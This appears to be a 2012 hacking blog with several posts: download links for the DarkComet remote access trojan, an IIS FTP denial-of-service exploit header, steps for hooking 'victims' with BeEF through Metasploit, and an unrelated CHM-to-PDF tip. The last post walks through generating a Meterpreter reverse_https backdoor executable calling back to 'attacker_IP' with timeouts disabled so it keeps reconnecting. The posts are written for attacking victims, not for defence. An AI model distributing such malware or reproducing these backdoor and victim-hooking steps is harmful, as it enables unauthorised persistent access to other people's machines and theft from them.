Jul 7, 2012

DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1

This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)

So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/tmvyibbasudexyr/DarkCometRAT531.zip


And this link for who you want to analysis find the DarkComet RAT server
http://pastebin.com/DEkWGR6E




If you like my blog, Please Donate Me

Jul 3, 2012

How to convert CHM files into PDF files in Ubuntu

In the Ubuntu, chm2pdf is a Python script that converts CHM files into PDF files.





 

1. Install chm2pdf in ubuntu and another required application
$sudo aptitude install chm2pdf python-chm pdftk htmldoc



2. Use the command chm2pdf
$ chm2pdf --book file.chm


3. you will receive file.pdf.

If you like my blog, Please Donate Me

Jul 2, 2012

Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

If you want to see the exploit code, please go to the Source.


# Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version:  Microsoft IIS 6 , 7.5  FTP Server
# Tested on: windows server 2008 r2 , seven , with two core prossosor
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command  requests to a Microsoft IIS FTP Server
#CPU usage goes up to max capacity  and server gets non responsive. 
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 

Source: 1337day.com/exploits/18909

If you like my blog, Please Donate Me

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git


4. Move file beef.rb to msf/plugins and lib/beef to msf/lib


5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console, load beef plugin
msf> load beef 

7. Connect to beef
msf> beef_connect http://127.0.0.1:3000 beef beef

8. Try to hook someone with beef

9. In the Metasploit Console, check the victim with beef_online
msf> beef_online

10. Target a victim that currently hooked with beef_target, if you have someone that currently hooked, choose it and display info of victim with -i options
msf> beef_target -i 0

11. Try another options with yourself.  

If you like my blog, Please Donate Me

Create Auto reconnect Backdoor With Metasploit

This post will show how to install the autoconnect backdoor in victim machine.

1.  Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe

2. Binding receiving backdoor service.
msf> use exploit/multi/handler
msf> PAYLOAD windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> exploit -j


3. Run the exe


4. If you kill the process with exploit -j, the backdoor will reconnect to attack_ip again and again.

 

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |